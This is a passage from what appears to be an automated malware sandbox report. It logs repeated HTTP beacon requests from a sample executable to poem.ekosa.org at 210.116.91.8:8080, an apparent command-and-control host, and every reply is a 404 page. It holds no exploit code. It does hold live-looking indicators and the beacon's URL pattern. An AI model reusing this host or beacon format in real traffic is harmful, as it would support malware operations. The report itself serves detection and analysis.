      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:28.988908052 CET500INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:28 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      55192.168.2.449822210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:29.263376951 CET500OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:29.530343056 CET501INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:28 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      56192.168.2.449823210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:29.813901901 CET502OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:30.075021982 CET502INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:29 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      57192.168.2.449824210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:30.446429968 CET503OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:30.707518101 CET507INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:29 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      58192.168.2.449826210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:30.978195906 CET513OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:31.238159895 CET517INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:31 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      59192.168.2.449827210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:31.513567924 CET520OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:31.771861076 CET523INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:31 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      6192.168.2.449765210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:00.138458967 CET122OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:00.403141022 CET123INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:00 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      60192.168.2.449828210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:32.158154011 CET527OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:32.421650887 CET530INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:32 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      61192.168.2.449829210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:32.698961973 CET532OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:32.968071938 CET536INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:32 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      62192.168.2.449830210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:33.239017010 CET538OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:33.502808094 CET541INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:33 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      63192.168.2.449831210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:33.884963036 CET542OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:34.146928072 CET542INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:33 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
